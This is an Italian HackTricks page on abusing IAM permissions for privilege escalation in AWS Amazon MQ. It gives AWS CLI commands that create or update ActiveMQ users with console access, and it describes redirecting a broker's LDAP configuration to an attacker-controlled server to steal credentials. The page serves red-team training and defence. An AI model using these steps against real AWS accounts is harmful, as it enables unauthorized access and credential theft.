AWS - MQ Privesc
Reading time: 3 minutes
tip
Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.
MQ
Per ulteriori informazioni su MQ controlla:
mq:ListBrokers
, mq:CreateUser
Con questi permessi puoi creare un nuovo utente in un broker ActimeMQ (questo non funziona in RabbitMQ):
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>
Impatto Potenziale: Accesso a informazioni sensibili navigando attraverso ActiveMQ
mq:ListBrokers
, mq:ListUsers
, mq:UpdateUser
Con questi permessi puoi creare un nuovo utente in un broker ActimeMQ (questo non funziona in RabbitMQ):
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>
Impatto Potenziale: Accesso a informazioni sensibili navigando attraverso ActiveMQ
mq:ListBrokers
, mq:UpdateBroker
Se un broker utilizza LDAP per l'autorizzazione con ActiveMQ. È possibile cambiare la configurazione del server LDAP utilizzato in uno controllato dall'attaccante. In questo modo l'attaccante sarà in grado di rubare tutte le credenziali inviate tramite LDAP.
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...
Se in qualche modo riuscissi a trovare le credenziali originali utilizzate da ActiveMQ, potresti eseguire un MitM, rubare le credenziali, utilizzarle nel server originale e inviare la risposta (forse semplicemente riutilizzando le credenziali rubate potresti farlo).
Impatto Potenziale: Rubare le credenziali di ActiveMQ
tip
Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.